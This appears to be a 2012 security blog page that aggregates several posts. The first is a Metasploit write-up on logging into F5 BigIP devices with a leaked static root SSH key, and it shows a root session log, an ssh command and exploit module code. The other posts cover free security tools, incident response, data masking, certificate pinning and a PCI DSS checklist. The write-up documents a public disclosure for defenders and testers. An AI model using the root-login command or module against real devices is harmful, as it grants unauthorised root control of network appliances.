Tuesday, June 26, 2012

Press F5 for root shell

Press F5 for root shell:
As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

Getting down to business, here it is in action:

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

    [+] Successful login
    [*] Found shell.
    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

    id; uname -a
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux
    ^Z
    Background session 3? [y/N]  y

    18:42:35 1 exploit(f5_bigip_known_privkey) >

Of course, since it's just a regular ssh key, you can easily just drop it in a file and use a standard ssh client.

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.
This bug is also interesting in that it gave us a good test case for using static SSH credentials as an exploit module rather than auxiliary. The key difference between exploit and auxiliary modules is usually the need for a payload. If it needs a payload: exploit. Otherwise, it's auxiliary. In this case it's a little blurry, though, because it results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some ruby acrobatics so they can still create a session despite not having a payload or a handler.

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.
First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need to but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit will require, we need a block in the module info like so:

    'Payload'     => {
      'Compat'  => {
        'PayloadType'    => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22),
      ], self.class

Lastly, because the handler is of type "find" we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find" because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect() but in this case it is necessary to let the handler know our socket is now a shell.

    def exploit
      conn = do_login("root")
      if conn
        print_good "Successful login"
        handler(conn.lsock)
      end
    end

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets since they're basically a giant packet sink that lets you read and modify traffic willy nilly. ARP spoofing is noisy and DNS poisoning is hard, let's just own the firewall.

Free Tools

Of course the first is going to be Rapid7 and the Metasploit

https://github.com/rapid7/metasploit-framework
Other company's free tools sections:
Sunera: http://security.sunera.com/p/tools.html
Immunity Inc: http://immunityinc.com/resources-freesoftware.shtml
SecureState: http://www.securestate.com/Research%20and%20Innovation/Pages/Tools.aspx
Core Security: http://corelabs.coresecurity.com/index.php?module=Wiki&action=list&type=tool
Hex-Rays: http://www.hex-rays.com/products/ida/support/download_freeware.shtml
Spider Labs: https://www.trustwave.com/spiderLabs-tools.php andhttps://github.com/SpiderLabs
RandomStorm: http://www.randomstorm.com/free-security-tools.php
SensePost: http://www.sensepost.com/labs/tools/pentest
Mc^H^H Foundstone: http://www.mcafee.com/us/downloads/free-tools/index.aspx
Stach and Liu: http://www.stachliu.com/resources/tools/
Secure Ideas: http://www.secureideas.net/publications.php (Projects on the right)
Buguroo: http://blog.buguroo.com/?cat=6
IOActive: http://ioactive.com/ioactive_labs_tools.html
HP: http://bit.ly/SWFScan_New
NirSoft: http://www.nirsoft.net/
Joeware: http://www.joeware.net/freetools/
and of course Microsoft Sys Internals:
http://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
Thanks Room362, for publishing this.

Wednesday, June 13, 2012

Monday, June 4, 2012

nullcon Goa 2012: An effective Incident Response Triage framework in the age of APT - By Albert Hui

 The talk begins by first introducing the dilemmas facing modern-day organizations, covering

1. the scalability challenge (the intrinsic imbalance between attackers and defenders -- e.g. it takes almost no cost to generate large amounts of obfuscated or even manually modified malware payloads but exponentially more expensive to scale-up the defense against it,

2. traditional IR / forensics capabilities are not focused on scalability -- e.g. takes half a day just to image hard drives and a day to come up with a forensic report, and

3. the fatal weakness in common HR model -- e.g. incompetent first tier IR / forensic staffs neglected to collect vital evidence in time or neglected to notice potent exploitations (e.g. "just another fake AV, let's get the box rebuilt"). All too often, misguided management decisions drive CSIRTs to self-destruction -- management is frustrated at not achieving results commensurate with the resources thrown into the problem, and analysts get burnt out fighting an unwinnable war.




Al, then takes a step back and reorientates the situation as an economic problem. I agree with him on this. With the use of strategic models we can bring out and highlight places where mitigations can start winning. He presents his vision of an effective CSIRT -- all the way from strategic direction, organization structure, the right level of empowerment, to the right metrics and mitigation principles.

Interesting presentation.

Understanding and Selecting Data Masking: Technical Architecture

Understanding and Selecting Data Masking: Technical Architecture:
Today we will discuss platform architectures and deployment models. Before I jump into the architectural models, it’s worth mentioning that these architectures are designed in response to how enterprises use data. Data is valuable because we use it to support business functions. Data has value in use. The more places we can leverage data to make decisions, the more valuable it is. However, as we have seen over the last decade, data propagation carries many risks. Masking architectures are designed to fit within existing data management frameworks and mitigate risks to information without sacrificing usefulness. In essence we are inserting controls into existing processes, using masking as a guardian, to identify risks and protect data as it migrates through the enterprise applications that automate business processes.

As I mentioned in the introduction, we have come a long way from masking as nothing more than a set of scripts run by an admin or database administrator. Back then you connected directly to a database, or ran scripts from the console, and manually moved files around. Today’s platforms proactively discover sensitive data and manage policies centrally, handling security and data distribution across dozens of different types of information management systems, automatically generating masked data as needed for different audiences. Masking products can stand alone, serving disparate data management systems simultaneously, or be embedded as a core function of a dedicated data management service.

Base Architecture


  • Single Server/Appliance: A single appliance or software installation that performs static ‘ETL’ data masking services. The server is wholly self-contained – performing all extraction, masking, and loading from a single location. This model is typically used in small and mid-sized enterprises. It can scale geographically, with independent servers in regional offices to handle masking functions, usually in response to specific regional regulatory requirements.
  • Distributed: This option consists of a central management server with remote agents/plug-ins/appliances that perform discovery and masking functions. The central server distributes masking rules, directs endpoint functionality, catalogs locations and nature of sensitive data, and tracks masked data sets. Remote agents periodically receive updates with new masking rules from the central server, and report back sensitive data that has been discovered, along with the results of masking jobs. Scaling is by pushing processing load out to the endpoints.
  • Centralized Architecture: Multiple masking servers, centrally located and managed by a single management server, are used primarily for production and management of masked data for multiple test and analytics systems.
  • Proxy/Bridge Cluster: One or more appliances or agents that dynamically mask streamed content, typically deployed in front of relational databases, to provide proxy-based data masking. This model is used for real-time masking of non-static data, such as database queries or loading into NoSQL databases. Multiple appliances provide scalability and failover capabilities. This may or may not be used in a two-tier architecture.

Appliances, software, and virtual appliance options are all available. But unlike most security products, where appliances dominate the market, masking vendors generally deliver their products as software. Windows, Linux, and UNIX support is all common, as is support for many types of files and relational databases. Support for virtual appliance deployment is common among the larger vendors but not universal, so inquire about availability if that is key to your IT service model.

A key masking evolution is the ability to apply masking policies across different data management systems (file management, databases, document management, etc.) regardless of platform type (Windows vs. Linux vs. …). Modern masking platforms are essentially data management systems, with policies set at a central location and applied to multiple systems through direct connection or remote agent software. As data is collected and moved from point A to point B, one or more data masks are applied to one or more ‘columns’ of the data.

Deployment and Endpoint Options


While masking architecture is conceptually simple, there are many different deployment options, each particularly suited to protecting one or more data management systems. And given masking technologies must work on static data copies, live database repositories, and dynamically generated data (streaming data feeds, application generated content, ad hoc data queries, etc.), a wide variety of deployment options are available to accommodate the different data management environments. Most companies deploy centralized masking servers to produce safe test and analytics data, but vendors offer the flexibility to embed masking directly into other applications and environments where large-footprint masking installations or appliances are unsuitable. The following is a sample of the common deployments used for remote data collection and processing.

Agent maskAgents: Agents are software components installed on a server, usually the same server that hosts the data management application. Agents have the option of being as simple or advanced as the masking vendor cares to make them. They can be nothing more than a data collector, sending data back to a remote masking server for processing, or might provide masking as data is collected. In the latter case, the agent masks data as it is received, either completely in memory or from a temporary file. Agents can be managed remotely by a masking server or directly by the data management application, effectively extending data management and collaboration system capabilities (e.g., MS SharePoint, SAP). One of the advantages of using agents at the endpoint rather than in-database stored procedures – which we will describe in a moment – is that all traces of unmasked data can be destroyed. Either by masking in ‘ephemeral’ memory, or by ensuring temporary files are overwritten, sensitive data is not leaked through temporary storage. Agents do consume local processor, memory, and storage – a significant issue for legacy platforms – but only a minor consideration for virtual machines and cloud deployments.

Web Plug-inWeb Server Plug-ins: Technically a form of agent, these plug-ins are installed as web application services, as part of an Apache/web application stack used to support the local application which manages data. Plug-ins are an efficient way to transparently implement masking within existing application environments, acting on the data stream before it reaches the application or extending the application’s functionality through Application Programming Interface (API) calls. This means plug-ins can be managed by a remote masking server through web API calls, or directly by the larger data management system. Deployment in the web server environment gives plug-ins the flexibility to perform ETL, in-place, and proxy masking. Proxy agents are most commonly used to decipher XML data streams, and are increasingly common for discovering and masking data streams prior to loading into “Big Data” analytic databases.

In-databaseStored Procedures/Triggers: A stored procedure is basically a small script that resides and runs inside a database. A trigger is a small function that manipulates data as records are inserted and updated in a database. Both these database features have been used to implement data masking. Stored procedures and triggers take advantage of the database’s natural capabilities to apply masking functions to data, seamlessly, inside the database. They can be used to mask ‘in-place’, replacing sensitive data, or periodically to create a masked ‘view’ of the original data.

  • *ODBC/JDBC Connectors:** ODBC stands for Open Database Connector, and JDBC for Java Database Connectivity Connector; each offerings a generic programatic interface to any type of relational database. These interfaces are used by applications that need to work directly with the database to query and update information. You can think about it like a telephone call between the database and the masking platform: The masking server establishes its identity to the database, asks for information, and then hangs up when the data has been transferred. As the masking platform can issue _any_ database query, it’s ideal for pulling incremental changes from a database and filtering out unneeded data. This is critical for reducing the size of the data set, reducing the total amount of processing power required to mask, and making extraction and load operations as efficient as possible. These interfaces are most commonly used to retrieve information for ETL style deployments, but are also leveraged in conjunction with stored procedures to implement in-place masking.

That’s plenty to contemplate for today. Next I will talk in detail about management capabilities – including discovery, policies, data set management, and advanced data masking features.

- Adrian Lane
(0) Comments

SSL certificate safety bolstered by standards that lessen dependence on CAs | Naked Security

2011 was a bad year for certificate authorities (CAs) and the privacy of internet users as multiple successful attacks against CAs resulted in a reduction in confidence of the basic structure of trust that SSL/TLS depend on.
Last summer Moxie Marlinspike proposed a new system calledConvergence that puts the decision about who to trust in the hands of users. There are some technical challenges with Marlinspike's approach and to date not many people have embraced the technology.
Within the last 6 months, two new proposals have come forward that look to make a more gradual, compatible transition away from the current model possible.
One proposed by Google engineers is called Public Key Pinning Extension for HTTP, while another similar idea backed by Marlinspike and Trevor Perrin is called Trust Assertions for Certificate Keys (TACK).
Some browsers like Google's Chrome have already implemented a similar approach called certificate pinning, but the implementation doesn't scale. Google Chrome ships with a set of pre-defined high-profile certificates installed for services like Gmail that are "pinned" and do not rely on CAs to validate.
This is how the DigiNotar CA breach was discovered. Users of Chrome and Gmail in Iran began getting warnings that their traffic was being intercepted by a man-in-the-middle attack through falsely signed certificates.
Hard coding certificates for more than a handful of sites is highly impractical though, and these new proposals address the scalability problem in an elegant way.
Initial contact to an HTTPS server will work the same as it does now, relying on CAs to verify you are talking to the right site. However for sites that would support these new extensions they could offer an extra digital signature of their certificate signed by the site owner.
Push pin courtesy of ShutterstockYour browser could keep a copy of this signature and "pin" it to identify a known public key that represents that site.
Subsequent visits would then check the signature of any certificates presented not only with the CAs, but also against the copy of the public key you pinned from a previous visit.
This means an attacker wishing to perform a man-in-the-middle attack would not only have to compromise a certificate authority, but also compromise the private key possessed by the web site operator.
Ultimately it lessens our dependence on the security of CAs by putting more power in the hands of web site operators and individuals.
This diversification of trust is a necessary step toward more independent verification of trust and potentially eliminating the need for CAs in the future.
Both proposals are in draft form with the IETF and there are many technical details not covered here. If you want to understand the differences and specifics, I recommend reading the proposals themselves as they are not terribly long.

PCI DSS audit checklist

What is PCI DSS

The Payment Card Industry Data Security Standard ( PCI DSS ) is an information securitystandard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards.



Pentestit has compiled a PCI DSS audit checklist in excel, Which every one can use for both implementation and audit of Payment Card environment. The Payment Card Industry DataSecurity Standard is widly been usd by banks, merchants, bill payments etc…

Excel contails four sheets in PCI DSS audit checklist:

  1. Introduction
  2. v1.1
  3. v1.2
  4. v2.0
We would love your responses, suggestions or any thing….
  • Note: password for read and write access is pentestit